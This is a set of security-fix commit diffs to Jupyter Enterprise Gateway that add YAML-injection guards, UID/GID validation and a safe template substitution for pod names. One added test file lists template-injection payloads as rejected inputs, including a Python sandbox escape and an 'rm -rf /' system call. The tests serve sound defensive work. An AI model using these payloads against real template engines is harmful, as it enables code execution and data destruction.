         pod_created = None
         kernel_namespace = keywords["kernel_namespace"]
    -    k8s_objs = yaml.safe_load_all(k8s_yaml)
    +    k8s_objs = list(yaml.safe_load_all(k8s_yaml))
    +    kind_counts: Dict[str, int] = {}
    +    for k8s_obj in k8s_objs:
    +        if not k8s_obj:
    +            continue
    +        kind = k8s_obj.get("kind")
    +        if kind not in ALLOWED_K8S_KINDS:
    +            sys.exit(
    +                f"ERROR - Unexpected resource kind '{kind}' in rendered manifest - "
    +                f"kernel launch terminating!"
    +            )
    +        kind_counts[kind] = kind_counts.get(kind, 0) + 1
    +    for kind, count in kind_counts.items():
    +        if count > MAX_DOCUMENTS_PER_KIND:
    +            sys.exit(
    +                f"ERROR - Rendered manifest contains {count} '{kind}' documents "
    +                f"(max {MAX_DOCUMENTS_PER_KIND}) - kernel launch terminating!"
    +            )
         for k8s_obj in k8s_objs:
             if k8s_obj.get("kind"):
                 if k8s_obj["kind"] == "Pod":
    
  • etc/kernel-launchers/operators/scripts/launch_custom_resource.py+38 1 modified
    @@ -2,6 +2,7 @@
     """Launch a custom operator resource."""
     import argparse
     import os
    +import re
     import sys
     
     import urllib3
    @@ -11,6 +12,24 @@
     
     urllib3.disable_warnings()
     
    +YAML_PARSED_KERNEL_VARS = {"KERNEL_VOLUME_MOUNTS", "KERNEL_VOLUMES"}
    +
    +
    +def yaml_safe_str(value):
    +    """Escape a value for safe inclusion in a YAML template.
    +
    +    Uses PyYAML's own serializer to produce properly escaped output:
    +    - Strings are double-quoted with special characters escaped.
    +    - Dicts/lists are serialized as YAML flow mappings/sequences.
    +    - None, bools, and numbers are serialized to their YAML-canonical form.
    +    """
    +    if isinstance(value, str):
    +        return yaml.dump(value, default_style='"', width=10000).strip()
    +    if isinstance(value, (dict, list)):
    +        return yaml.dump(value, default_flow_style=True, width=10000).strip()
    +    # yaml.dump appends a document-end marker ("...\n") for scalars; strip it
    +    return yaml.dump(value, width=10000).replace("\n...", "").strip()
    +
     
     def generate_kernel_custom_resource_yaml(kernel_crd_template, keywords):
         """Generate the kernel custom resource yaml given a template."""
    @@ -27,6 +46,8 @@ def generate_kernel_custom_resource_yaml(kernel_crd_template, keywords):
                 default=True,
             ),
         )
    +    j_env.filters["yaml_safe"] = yaml_safe_str
    +
         k8s_yaml = j_env.get_template("/" + kernel_crd_template + ".yaml.j2").render(**keywords)
         return k8s_yaml
     
    @@ -70,18 +91,34 @@ def launch_custom_resource_kernel(
         )
         keywords["spark_context_initialization_mode"] = spark_context_init_mode
     
    +    # Only parse YAML for variables that legitimately carry structured data (lists/dicts);
    +    # treat all others as raw strings to prevent YAML injection attacks.
         for name, value in os.environ.items():
             if name.startswith("KERNEL_"):
    -            keywords[name.lower()] = yaml.safe_load(value)
    +            if name in YAML_PARSED_KERNEL_VARS:
    +                parsed = yaml.safe_load(value)
    +                if not isinstance(parsed, list) or not all(isinstance(item, dict) for item in parsed):
    +                    sys.exit(
    +                        f"ERROR - {name} must be a YAML list of mappings - "
    +                        f"kernel launch terminating!"
    +                    )
    +                keywords[name.lower()] = parsed
    +            else:
    +                keywords[name.lower()] = value
     
         kernel_crd_template = keywords["kernel_crd_group"] + "-" + keywords["kernel_crd_version"]
    +    if not re.match(r'^[a-z0-9][a-z0-9.\-]*-v[a-z0-9]+$', kernel_crd_template):
    +        sys.exit(f"ERROR - Invalid CRD template name: {kernel_crd_template} - kernel launch terminating!")
    +
         custom_resource_yaml = generate_kernel_custom_resource_yaml(kernel_crd_template, keywords)
     
         kernel_namespace = keywords["kernel_namespace"]
         group = keywords["kernel_crd_group"]
         version = keywords["kernel_crd_version"]
         plural = keywords["kernel_crd_plural"]
         custom_resource_object = yaml.safe_load(custom_resource_yaml)
    +    if not isinstance(custom_resource_object, dict) or "kind" not in custom_resource_object:
    +        sys.exit("ERROR - Rendered CRD manifest is not a valid single-document YAML - kernel launch terminating!")
         if group == "sparkoperator.k8s.io":
             extend_operator_env(custom_resource_object, "driver")
             extend_operator_env(custom_resource_object, "executor")
    
  • etc/kernel-launchers/operators/scripts/sparkoperator.k8s.io-v1beta2.yaml.j2+16 16 modified
    @@ -1,26 +1,26 @@
     apiVersion: "sparkoperator.k8s.io/v1beta2"
     kind: SparkApplication
     metadata:
    -  name: {{ kernel_resource_name }}
    +  name: {{ kernel_resource_name | yaml_safe }}
     spec:
       restartPolicy:
         type: Never
       type: Python
       pythonVersion: "3"
       sparkVersion: 2.4.5
    -  image: {{ kernel_image }}
    +  image: {{ kernel_image | yaml_safe }}
       mainApplicationFile: "local:///usr/local/bin/kernel-launchers/python/scripts/launch_ipykernel.py"
       arguments:
         - "--kernel-id"
    -    - "{{ kernel_id }}"
    +    - {{ kernel_id | yaml_safe }}
         - "--spark-context-initialization-mode"
    -    - "{{ spark_context_initialization_mode }}"
    +    - {{ spark_context_initialization_mode | yaml_safe }}
         - "--response-address"
    -    - "{{ eg_response_address }}"
    +    - {{ eg_response_address | yaml_safe }}
         - "--port-range"
    -    - "{{ eg_port_range }}"
    +    - {{ eg_port_range | yaml_safe }}
         - "--public-key"
    -    - "{{ eg_public_key }}"
    +    - {{ eg_public_key | yaml_safe }}
       driver:
         annotations:
           cluster-autoscaler.kubernetes.io/safe-to-evict: "false"
    @@ -30,9 +30,9 @@ spec:
     # e.g., helm install my-release spark-operator/spark-operator --namespace spark-operator --set webhook.enable=true
     #    - name: MY_DRIVER_ENV
     #      value: "my_driver_value"
    -    serviceAccount: "{{ kernel_service_account_name }}"
    +    serviceAccount: {{ kernel_service_account_name | yaml_safe }}
         labels:
    -      kernel_id: "{{ kernel_id }}"
    +      kernel_id: {{ kernel_id | yaml_safe }}
           app: enterprise-gateway
           component: kernel
         cores: 1
    @@ -41,13 +41,13 @@ spec:
         volumeMounts:
           {% if kernel_volume_mounts is defined %}
             {% for mount in kernel_volume_mounts %}
    -      - {{ mount }}
    +      - {{ mount | yaml_safe }}
             {% endfor %}
           {% endif %}
         volumes:
           {% if kernel_volumes is defined %}
             {% for volume in kernel_volumes %}
    -      - {{ volume }}
    +      - {{ volume | yaml_safe }}
             {% endfor %}
           {% endif %}
       executor:
    @@ -58,26 +58,26 @@ spec:
     #    - name: MY_EXECUTOR_ENV
     #      value: "my_executor_value"
         labels:
    -      kernel_id: "{{ kernel_id }}"
    +      kernel_id: {{ kernel_id | yaml_safe }}
           app: enterprise-gateway
           component: worker
    -    image: {{ kernel_executor_image }}
    +    image: {{ kernel_executor_image | yaml_safe }}
         instances: 2
         cores: 1
         coreLimit: 1000m
         memory: 1g
         volumeMounts:
           {% if kernel_volume_mounts is defined %}
             {% for mount in kernel_volume_mounts %}
    -      - {{ mount }}
    +      - {{ mount | yaml_safe }}
             {% endfor %}
           {% endif %}
         volumes:
           {% if kernel_volumes is defined %}
             {% for volume in kernel_volumes %}
    -      - {{ volume }}
    +      - {{ volume | yaml_safe }}
             {% endfor %}
           {% endif %}
     {% if kernel_sparkapp_config_map %}
    -  sparkConfigMap: {{ kernel_sparkapp_config_map }}
    +  sparkConfigMap: {{ kernel_sparkapp_config_map | yaml_safe }}
     {% endif %}
    
562068d0c6c6

Enhance validation of UID and GUID against prohibited ids

https://github.com/jupyter-server/enterprise_gatewayLuciano ResendeApr 25, 2026Fixed in 3.3.0via ghsa-release-walk
2 files changed · +259 17
  • enterprise_gateway/services/processproxies/container.py+75 15 modified
    @@ -6,6 +6,7 @@
     from __future__ import annotations
     
     import abc
    +import logging
     import os
     import signal
     from typing import Any
    @@ -16,18 +17,48 @@
     from ..kernels.remotemanager import RemoteKernelManager
     from .processproxy import RemoteProcessProxy
     
    +log = logging.getLogger(__name__)
    +
     urllib3.disable_warnings()
     
     local_ip = localinterfaces.public_ips()[0]
     
     default_kernel_uid = "1000"  # jovyan user is the default
     default_kernel_gid = "100"  # users group is the default
     
    +
    +def _parse_prohibited_ids(env_var: str, default: str) -> list[int]:
    +    """Parse a comma-separated list of IDs from an environment variable into integers.
    +
    +    Raises:
    +        ValueError: If any entry in the configured value is not a valid integer.
    +            This enforces a fail-closed posture — a misconfigured prohibited list
    +            (e.g. usernames instead of numeric IDs) will prevent startup rather than
    +            silently yielding an empty list.
    +    """
    +    result: list[int] = []
    +    raw_value = os.getenv(env_var, default)
    +    for item in raw_value.split(","):
    +        item = item.strip()
    +        if item:
    +            try:
    +                result.append(int(item))
    +            except ValueError:
    +                msg = (
    +                    f"Invalid entry '{item}' in {env_var}='{raw_value}'. "
    +                    f"All entries must be numeric IDs, not usernames or group names. "
    +                    f"Example: {env_var}=0,1000"
    +                )
    +                log.critical(msg)
    +                raise ValueError(msg)
    +    return result
    +
    +
     # These could be enforced via a PodSecurityPolicy, but those affect
     # all pods so the cluster admin would need to configure those for
     # all applications.
    -prohibited_uids = os.getenv("EG_PROHIBITED_UIDS", "0").split(",")
    -prohibited_gids = os.getenv("EG_PROHIBITED_GIDS", "0").split(",")
    +prohibited_uids = _parse_prohibited_ids("EG_PROHIBITED_UIDS", "0")
    +prohibited_gids = _parse_prohibited_ids("EG_PROHIBITED_GIDS", "0")
     
     mirror_working_dirs = bool(os.getenv("EG_MIRROR_WORKING_DIRS", "false").lower() == "true")
     
    @@ -110,22 +141,51 @@ def _enforce_prohibited_ids(self, **kwargs: dict[str, Any] | None) -> None:
             kernel_uid = kwargs["env"].get("KERNEL_UID", default_kernel_uid)
             kernel_gid = kwargs["env"].get("KERNEL_GID", default_kernel_gid)
     
    -        if kernel_uid in prohibited_uids:
    -            http_status_code = 403
    -            error_message = (
    -                f"Kernel's UID value of '{kernel_uid}' has been denied via EG_PROHIBITED_UIDS!"
    +        try:
    +            uid_int = int(kernel_uid)
    +        except (ValueError, TypeError):
    +            self.log_and_raise(
    +                http_status_code=403,
    +                reason=f"Invalid KERNEL_UID value '{kernel_uid}': not a valid integer!",
    +            )
    +
    +        try:
    +            gid_int = int(kernel_gid)
    +        except (ValueError, TypeError):
    +            self.log_and_raise(
    +                http_status_code=403,
    +                reason=f"Invalid KERNEL_GID value '{kernel_gid}': not a valid integer!",
    +            )
    +
    +        max_id = 4294967295  # uint32 max — Linux uid_t/gid_t upper bound
    +
    +        if not (0 <= uid_int <= max_id):
    +            self.log_and_raise(
    +                http_status_code=403,
    +                reason=f"Invalid KERNEL_UID value '{kernel_uid}': must be in range 0-{max_id}!",
    +            )
    +
    +        if not (0 <= gid_int <= max_id):
    +            self.log_and_raise(
    +                http_status_code=403,
    +                reason=f"Invalid KERNEL_GID value '{kernel_gid}': must be in range 0-{max_id}!",
                 )
    -            self.log_and_raise(http_status_code=http_status_code, reason=error_message)
    -        elif kernel_gid in prohibited_gids:
    -            http_status_code = 403
    -            error_message = (
    -                f"Kernel's GID value of '{kernel_gid}' has been denied via EG_PROHIBITED_GIDS!"
    +
    +        if uid_int in prohibited_uids:
    +            self.log_and_raise(
    +                http_status_code=403,
    +                reason=f"Kernel's UID value of '{kernel_uid}' has been denied via EG_PROHIBITED_UIDS!",
    +            )
    +
    +        if gid_int in prohibited_gids:
    +            self.log_and_raise(
    +                http_status_code=403,
    +                reason=f"Kernel's GID value of '{kernel_gid}' has been denied via EG_PROHIBITED_GIDS!",
                 )
    -            self.log_and_raise(http_status_code=http_status_code, reason=error_message)
     
    -        # Ensure the kernel's env has what it needs in case they came from defaults
    -        kwargs["env"]["KERNEL_UID"] = kernel_uid
    -        kwargs["env"]["KERNEL_GID"] = kernel_gid
    +        # Ensure the kernel's env has normalized values
    +        kwargs["env"]["KERNEL_UID"] = str(uid_int)
    +        kwargs["env"]["KERNEL_GID"] = str(gid_int)
     
         def poll(self) -> bool | None:
             """Determines if container is still active.
    
  • enterprise_gateway/tests/test_process_proxy.py+184 2 modified
    @@ -1,15 +1,195 @@
     # Copyright (c) Jupyter Development Team.
     # Distributed under the terms of the Modified BSD License.
    -"""Tests for Kubernetes process proxy security fixes."""
    +"""Tests for process proxy functionality."""
     
    +import os
     import unittest
     from unittest.mock import Mock, patch
     
    +from tornado import web
    +
    +from enterprise_gateway.services.processproxies.container import _parse_prohibited_ids
    +
     # Mock Kubernetes configuration before importing the module
     with patch('kubernetes.config.load_incluster_config'), patch('kubernetes.config.load_kube_config'):
         from enterprise_gateway.services.processproxies.k8s import KubernetesProcessProxy
     
     
    +class TestParseProhibitedIds(unittest.TestCase):
    +    """Test parsing of prohibited UID/GID environment variables."""
    +
    +    def test_default_value(self):
    +        with patch.dict(os.environ, {}, clear=False):
    +            os.environ.pop("TEST_IDS", None)
    +            result = _parse_prohibited_ids("TEST_IDS", "0")
    +        self.assertEqual(result, [0])
    +
    +    def test_multiple_values(self):
    +        with patch.dict(os.environ, {"TEST_IDS": "0,1000"}):
    +            result = _parse_prohibited_ids("TEST_IDS", "0")
    +        self.assertEqual(result, [0, 1000])
    +
    +    def test_values_with_spaces(self):
    +        with patch.dict(os.environ, {"TEST_IDS": "0, 1000, 65534"}):
    +            result = _parse_prohibited_ids("TEST_IDS", "0")
    +        self.assertEqual(result, [0, 1000, 65534])
    +
    +    def test_invalid_entries_raise_value_error(self):
    +        with patch.dict(os.environ, {"TEST_IDS": "0,abc,1000"}):
    +            with self.assertRaises(ValueError) as ctx:
    +                _parse_prohibited_ids("TEST_IDS", "0")
    +            self.assertIn("abc", str(ctx.exception))
    +            self.assertIn("TEST_IDS", str(ctx.exception))
    +
    +    def test_username_instead_of_uid_raises_value_error(self):
    +        with patch.dict(os.environ, {"TEST_IDS": "root"}):
    +            with self.assertRaises(ValueError) as ctx:
    +                _parse_prohibited_ids("TEST_IDS", "0")
    +            self.assertIn("root", str(ctx.exception))
    +
    +    def test_empty_entries_ignored(self):
    +        with patch.dict(os.environ, {"TEST_IDS": "0,,1000"}):
    +            result = _parse_prohibited_ids("TEST_IDS", "0")
    +        self.assertEqual(result, [0, 1000])
    +
    +
    +class TestContainerProxyProhibitedIds(unittest.TestCase):
    +    """Test UID/GID validation in ContainerProcessProxy."""
    +
    +    def setUp(self):
    +        self.mock_kernel_manager = Mock()
    +        self.mock_kernel_manager.get_kernel_username.return_value = "testuser"
    +        self.mock_kernel_manager.port_range = "0..0"
    +        self.proxy_config = {"kernel_id": "test-kernel-id", "kernel_name": "python3"}
    +        with patch(
    +            'enterprise_gateway.services.processproxies.k8s.KernelSessionManager'
    +        ) as mock_session_manager, patch(
    +            'enterprise_gateway.services.processproxies.processproxy.ResponseManager'
    +        ):
    +            mock_session_manager.get_kernel_username.return_value = "testuser"
    +            self.proxy = KubernetesProcessProxy(self.mock_kernel_manager, self.proxy_config)
    +
    +    def _make_kwargs(self, uid=None, gid=None):
    +        env = {}
    +        if uid is not None:
    +            env["KERNEL_UID"] = uid
    +        if gid is not None:
    +            env["KERNEL_GID"] = gid
    +        return {"env": env}
    +
    +    def test_valid_uid_gid_passes(self):
    +        kwargs = self._make_kwargs(uid="1000", gid="100")
    +        self.proxy._enforce_prohibited_ids(**kwargs)
    +        self.assertEqual(kwargs["env"]["KERNEL_UID"], "1000")
    +        self.assertEqual(kwargs["env"]["KERNEL_GID"], "100")
    +
    +    def test_defaults_used_when_not_provided(self):
    +        kwargs = self._make_kwargs()
    +        self.proxy._enforce_prohibited_ids(**kwargs)
    +        self.assertEqual(kwargs["env"]["KERNEL_UID"], "1000")
    +        self.assertEqual(kwargs["env"]["KERNEL_GID"], "100")
    +
    +    def test_prohibited_uid_exact_match(self):
    +        kwargs = self._make_kwargs(uid="0", gid="100")
    +        with self.assertRaises(web.HTTPError) as ctx:
    +            self.proxy._enforce_prohibited_ids(**kwargs)
    +        self.assertEqual(ctx.exception.status_code, 403)
    +
    +    def test_prohibited_gid_exact_match(self):
    +        kwargs = self._make_kwargs(uid="1000", gid="0")
    +        with self.assertRaises(web.HTTPError) as ctx:
    +            self.proxy._enforce_prohibited_ids(**kwargs)
    +        self.assertEqual(ctx.exception.status_code, 403)
    +
    +    def test_trailing_whitespace_uid_denied(self):
    +        kwargs = self._make_kwargs(uid="0 ", gid="100")
    +        with self.assertRaises(web.HTTPError) as ctx:
    +            self.proxy._enforce_prohibited_ids(**kwargs)
    +        self.assertEqual(ctx.exception.status_code, 403)
    +
    +    def test_leading_whitespace_uid_denied(self):
    +        kwargs = self._make_kwargs(uid=" 0", gid="100")
    +        with self.assertRaises(web.HTTPError) as ctx:
    +            self.proxy._enforce_prohibited_ids(**kwargs)
    +        self.assertEqual(ctx.exception.status_code, 403)
    +
    +    def test_leading_zeros_uid_denied(self):
    +        kwargs = self._make_kwargs(uid="00", gid="100")
    +        with self.assertRaises(web.HTTPError) as ctx:
    +            self.proxy._enforce_prohibited_ids(**kwargs)
    +        self.assertEqual(ctx.exception.status_code, 403)
    +
    +    def test_plus_sign_uid_denied(self):
    +        kwargs = self._make_kwargs(uid="+0", gid="100")
    +        with self.assertRaises(web.HTTPError) as ctx:
    +            self.proxy._enforce_prohibited_ids(**kwargs)
    +        self.assertEqual(ctx.exception.status_code, 403)
    +
    +    def test_non_numeric_uid_rejected(self):
    +        kwargs = self._make_kwargs(uid="abc", gid="100")
    +        with self.assertRaises(web.HTTPError) as ctx:
    +            self.proxy._enforce_prohibited_ids(**kwargs)
    +        self.assertEqual(ctx.exception.status_code, 403)
    +
    +    def test_empty_uid_rejected(self):
    +        kwargs = self._make_kwargs(uid="", gid="100")
    +        with self.assertRaises(web.HTTPError) as ctx:
    +            self.proxy._enforce_prohibited_ids(**kwargs)
    +        self.assertEqual(ctx.exception.status_code, 403)
    +
    +    def test_negative_uid_rejected(self):
    +        kwargs = self._make_kwargs(uid="-1", gid="100")
    +        with self.assertRaises(web.HTTPError) as ctx:
    +            self.proxy._enforce_prohibited_ids(**kwargs)
    +        self.assertEqual(ctx.exception.status_code, 403)
    +        self.assertIn("must be in range", ctx.exception.reason)
    +
    +    def test_negative_gid_rejected(self):
    +        kwargs = self._make_kwargs(uid="1000", gid="-1")
    +        with self.assertRaises(web.HTTPError) as ctx:
    +            self.proxy._enforce_prohibited_ids(**kwargs)
    +        self.assertEqual(ctx.exception.status_code, 403)
    +        self.assertIn("must be in range", ctx.exception.reason)
    +
    +    def test_uid_exceeding_uint32_max_rejected(self):
    +        kwargs = self._make_kwargs(uid="4294967296", gid="100")
    +        with self.assertRaises(web.HTTPError) as ctx:
    +            self.proxy._enforce_prohibited_ids(**kwargs)
    +        self.assertEqual(ctx.exception.status_code, 403)
    +        self.assertIn("must be in range", ctx.exception.reason)
    +
    +    def test_gid_exceeding_uint32_max_rejected(self):
    +        kwargs = self._make_kwargs(uid="1000", gid="4294967296")
    +        with self.assertRaises(web.HTTPError) as ctx:
    +            self.proxy._enforce_prohibited_ids(**kwargs)
    +        self.assertEqual(ctx.exception.status_code, 403)
    +        self.assertIn("must be in range", ctx.exception.reason)
    +
    +    def test_uid_at_uint32_max_allowed(self):
    +        kwargs = self._make_kwargs(uid="4294967295", gid="100")
    +        self.proxy._enforce_prohibited_ids(**kwargs)
    +        self.assertEqual(kwargs["env"]["KERNEL_UID"], "4294967295")
    +
    +    def test_normalized_values_stored(self):
    +        kwargs = self._make_kwargs(uid=" 1000 ", gid=" 100 ")
    +        self.proxy._enforce_prohibited_ids(**kwargs)
    +        self.assertEqual(kwargs["env"]["KERNEL_UID"], "1000")
    +        self.assertEqual(kwargs["env"]["KERNEL_GID"], "100")
    +
    +    def test_both_uid_and_gid_checked_independently(self):
    +        kwargs = self._make_kwargs(uid="1000", gid="0")
    +        with self.assertRaises(web.HTTPError) as ctx:
    +            self.proxy._enforce_prohibited_ids(**kwargs)
    +        self.assertEqual(ctx.exception.status_code, 403)
    +        self.assertIn("GID", ctx.exception.reason)
    +
    +    def test_trailing_whitespace_gid_denied(self):
    +        kwargs = self._make_kwargs(uid="1000", gid="0 ")
    +        with self.assertRaises(web.HTTPError) as ctx:
    +            self.proxy._enforce_prohibited_ids(**kwargs)
    +        self.assertEqual(ctx.exception.status_code, 403)
    +
    +
     class TestKubernetesProcessProxy(unittest.TestCase):
         """Test secure template substitution in Kubernetes process proxy."""
     
    @@ -23,7 +203,9 @@ def setUp(self):
             self.proxy_config = {"kernel_id": "test-kernel-id", "kernel_name": "python3"}
             with patch(
                 'enterprise_gateway.services.processproxies.k8s.KernelSessionManager'
    -        ) as mock_session_manager:
    +        ) as mock_session_manager, patch(
    +            'enterprise_gateway.services.processproxies.processproxy.ResponseManager'
    +        ):
                 mock_session_manager.get_kernel_username.return_value = "testuser"
                 self.proxy = KubernetesProcessProxy(self.mock_kernel_manager, self.proxy_config)
                 self.proxy.kernel_id = "test-kernel-id"
    
2d5584351c95

Upgrade the base docker image of kernel-r (#1438)

https://github.com/jupyter-server/enterprise_gatewaySantan MaddiMar 6, 2026Fixed in 3.3.0via ghsa-release-walk
1 file changed · +1 1
  • etc/docker/kernel-r/Dockerfile+1 1 modified
    @@ -1,5 +1,5 @@
     # Ubuntu 18.04.1 LTS Bionic
    -ARG BASE_CONTAINER=jupyter/r-notebook:2023-03-13
    +ARG BASE_CONTAINER=quay.io/jupyter/r-notebook:r-4.5.2
     FROM $BASE_CONTAINER
     
     RUN conda install --quiet --yes \
    
1e6b2f354976

Fix KERNEL_POD_NAME substitution to avoid SSTI (#1412)

https://github.com/jupyter-server/enterprise_gatewayLuciano ResendeAug 9, 2025Fixed in 3.3.0via ghsa-release-walk
4 files changed · +287 9
  • docs/source/users/kernel-envs.md+5 2 modified
    @@ -76,9 +76,12 @@ There are several supported `KERNEL_` variables that the Enterprise Gateway serv
         it is the user's responsibility that KERNEL_POD_NAME is unique relative to
         any pods in the target namespace.  In addition, the pod must NOT exist -
         unlike the case if KERNEL_NAMESPACE is provided. The KERNEL_POD_NAME can
    -    also be provided as a jinja2 template string
    +    also be provided as a jinja2 template formatted string
         (e.g "{{ kernel_prefix }}-{{ kernel_id | replace('-', '') }}")
    -    which will be evaluated against existing list of environment variables.
    +    which will be processed for safe substitution against existing list
    +    of environment variables. In case of invalid template (e.g. missing variables)
    +    it will fall back to original way to calculate the pod name using
    +    KERNEL_USERNAME - KERNEL_ID.
     
       KERNEL_REMOTE_HOST=<remote host name>
         DistributedProcessProxy only.  When specified, this value will override the
    
  • enterprise_gateway/services/processproxies/k8s.py+50 6 modified
    @@ -11,7 +11,6 @@
     from typing import Any
     
     import urllib3
    -from jinja2 import BaseLoader, Environment
     from kubernetes import client, config
     
     from ..kernels.remotemanager import RemoteKernelManager
    @@ -216,6 +215,42 @@ def terminate_container_resources(self) -> bool | None:
     
             return result
     
    +    def _safe_template_substitute(self, template_str: str, variables: dict) -> str | None:
    +        """
    +        Safely substitute variables in Jinja2-style template syntax.
    +        Only supports simple variable substitution: {{ variable_name }}
    +        Logs missing variables and returns None if any are missing.
    +        """
    +        # Pattern to match {{ variable_name }} with optional whitespace
    +        # Explicitly exclude variables starting with underscore to prevent magic method attacks
    +        pattern = r'\{\{\s*([a-zA-Z][a-zA-Z0-9_]*)\s*\}\}'
    +        missing_vars = []
    +
    +        def replace_var(match):
    +            var_name = match.group(1)
    +            if var_name in variables:
    +                return str(variables[var_name])
    +            else:
    +                missing_vars.append(var_name)
    +                return match.group(0)  # Keep original placeholder
    +
    +        result = re.sub(pattern, replace_var, template_str)
    +
    +        # Check if there are any remaining {{ }} patterns that didn't match our simple pattern
    +        # This catches malicious templates like {{ foo.__class__ }} or {{ 1+1 }}
    +        if '{{' in result and '}}' in result:
    +            self.log.warning(
    +                "Invalid template syntax detected in KERNEL_POD_NAME: contains unsupported expressions"
    +            )
    +            return None
    +
    +        # Log missing variables and return None if any are missing
    +        if missing_vars:
    +            self.log.warning(f"Template variables not found in KERNEL_POD_NAME: {missing_vars}")
    +            return None  # Signal caller to use default
    +
    +        return result
    +
         def _determine_kernel_pod_name(self, **kwargs: dict[str, Any] | None) -> str:
             pod_name = kwargs["env"].get("KERNEL_POD_NAME")
     
    @@ -224,16 +259,25 @@ def _determine_kernel_pod_name(self, **kwargs: dict[str, Any] | None) -> str:
             else:
                 self.log.debug(f"Processing KERNEL_POD_NAME based on env var => {pod_name}")
                 if "{{" in pod_name and "}}" in pod_name:
    -                self.log.debug("Processing KERNEL_POD_NAME as jinja template")
    -                # Create Jinja2 environment
    +                self.log.debug("Processing KERNEL_POD_NAME template variables")
                     keywords = {}
                     for name, value in kwargs["env"].items():
                         if name.startswith("KERNEL_"):
                             keywords[name.lower()] = value
                     keywords["kernel_id"] = self.kernel_id
    -                self.log.debug("Processing pod_name jinja template")
    -                env = Environment(loader=BaseLoader(), autoescape=True)
    -                pod_name = env.from_string(pod_name).render(**keywords)
    +
    +                # Safe template substitution with fallback
    +                substituted = self._safe_template_substitute(pod_name, keywords)
    +                if substituted is None:
    +                    # Fall back to default if template variables are missing
    +                    self.log.warning(
    +                        "Falling back to default pod name due to missing template variables"
    +                    )
    +                    pod_name = (
    +                        KernelSessionManager.get_kernel_username(**kwargs) + "-" + self.kernel_id
    +                    )
    +                else:
    +                    pod_name = substituted
     
             # Rewrite pod_name to be compatible with DNS name convention
             # And put back into env since kernel needs this
    
  • enterprise_gateway/tests/test_process_proxy.py+231 0 added
    @@ -0,0 +1,231 @@
    +# Copyright (c) Jupyter Development Team.
    +# Distributed under the terms of the Modified BSD License.
    +"""Tests for Kubernetes process proxy security fixes."""
    +
    +import unittest
    +from unittest.mock import Mock, patch
    +
    +# Mock Kubernetes configuration before importing the module
    +with patch('kubernetes.config.load_incluster_config'), patch('kubernetes.config.load_kube_config'):
    +    from enterprise_gateway.services.processproxies.k8s import KubernetesProcessProxy
    +
    +
    +class TestKubernetesProcessProxy(unittest.TestCase):
    +    """Test secure template substitution in Kubernetes process proxy."""
    +
    +    def setUp(self):
    +        """Set up test fixtures."""
    +        self.mock_kernel_manager = Mock()
    +        self.mock_kernel_manager.get_kernel_username.return_value = "testuser"
    +        self.mock_kernel_manager.port_range = "0..0"  # Mock port range
    +
    +        # Mock proxy config
    +        self.proxy_config = {"kernel_id": "test-kernel-id", "kernel_name": "python3"}
    +
    +        # Mock KernelSessionManager methods
    +        with patch(
    +            'enterprise_gateway.services.processproxies.k8s.KernelSessionManager'
    +        ) as mock_session_manager:
    +            mock_session_manager.get_kernel_username.return_value = "testuser"
    +            self.proxy = KubernetesProcessProxy(self.mock_kernel_manager, self.proxy_config)
    +            self.proxy.kernel_id = "test-kernel-id"
    +
    +    def test_valid_template_substitution(self):
    +        """Test valid template variable substitution."""
    +        test_cases = [
    +            # Basic variable substitution
    +            ("{{ kernel_id }}", {"kernel_id": "test-123"}, "test-123"),
    +            # Multiple variables
    +            (
    +                "{{ kernel_namespace }}-{{ kernel_id }}",
    +                {"kernel_namespace": "default", "kernel_id": "test-123"},
    +                "default-test-123",
    +            ),
    +            # Variables with underscores
    +            ("{{ kernel_image_pull_policy }}", {"kernel_image_pull_policy": "Always"}, "Always"),
    +            # Whitespace handling
    +            ("{{   kernel_id   }}", {"kernel_id": "test-123"}, "test-123"),
    +        ]
    +
    +        for template, variables, expected in test_cases:
    +            with self.subTest(template=template):
    +                result = self.proxy._safe_template_substitute(template, variables)
    +                self.assertEqual(result, expected)
    +
    +    def test_missing_variables_fallback(self):
    +        # Test the full pod name determination process
    +        kwargs = {
    +            "env": {
    +                "KERNEL_POD_NAME": "{{ missing_var }}",
    +                "KERNEL_NAMESPACE": "production",
    +            }
    +        }
    +
    +        with patch.object(self.proxy, 'log'), patch(
    +            'enterprise_gateway.services.processproxies.k8s.KernelSessionManager'
    +        ) as mock_session_manager:
    +            mock_session_manager.get_kernel_username.return_value = "testuser"
    +            result = self.proxy._determine_kernel_pod_name(**kwargs)
    +            # Should fall back to default naming: kernel_username + "-" + kernel_id
    +            self.assertEqual(result, "testuser-test-kernel-id")
    +
    +    def test_malicious_template_injection_prevention(self):
    +        """Test prevention of malicious template injection attacks."""
    +        malicious_templates = [
    +            # Python code execution attempts
    +            "{{ ''.__class__.__mro__[1].__subclasses__()[104].__init__.__globals__['sys'].exit() }}",
    +            "{{ __import__('os').system('rm -rf /') }}",
    +            "{{ exec('print(\"pwned\")') }}",
    +            "{{ eval('1+1') }}",
    +            # Attribute access attempts
    +            "{{ kernel_id.__class__ }}",
    +            "{{ kernel_id.__dict__ }}",
    +            "{{ kernel_id.__globals__ }}",
    +            # Function calls
    +            "{{ range(10) }}",
    +            "{{ len(kernel_id) }}",
    +            "{{ str.upper(kernel_id) }}",
    +            # Jinja2 filters and expressions
    +            "{{ kernel_id|upper }}",
    +            "{{ kernel_id + '_suffix' }}",
    +            "{{ 1 + 1 }}",
    +            # Complex expressions
    +            "{{ kernel_id if kernel_id else 'default' }}",
    +            "{{ kernel_id[:5] }}",
    +        ]
    +
    +        variables = {"kernel_id": "test-123"}
    +
    +        for malicious_template in malicious_templates:
    +            with self.subTest(template=malicious_template), patch.object(
    +                self.proxy, 'log'
    +            ) as mock_log:
    +                result = self.proxy._safe_template_substitute(malicious_template, variables)
    +                # All malicious templates should be treated as invalid and return None
    +                self.assertIsNone(result)
    +                mock_log.warning.assert_called_once()
    +                # Should warn about unsupported expressions
    +                self.assertIn("Invalid template syntax", mock_log.warning.call_args[0][0])
    +
    +    def test_pod_name_determination_with_templates(self):
    +        """Test complete pod name determination with template processing."""
    +        kwargs = {
    +            "env": {
    +                "KERNEL_POD_NAME": "{{ kernel_namespace }}-{{ kernel_id }}",
    +                "KERNEL_NAMESPACE": "production",
    +                "KERNEL_IMAGE": "python:3.9",
    +            }
    +        }
    +
    +        with patch.object(self.proxy, 'log'):
    +            result = self.proxy._determine_kernel_pod_name(**kwargs)
    +            # Should get processed and DNS-normalized
    +            self.assertEqual(result, "production-test-kernel-id")
    +
    +    def test_pod_name_determination_with_malicious_template(self):
    +        """Test pod name determination with malicious template falls back to default."""
    +        kwargs = {
    +            "env": {
    +                "KERNEL_POD_NAME": "{{ __import__('os').system('evil') }}",
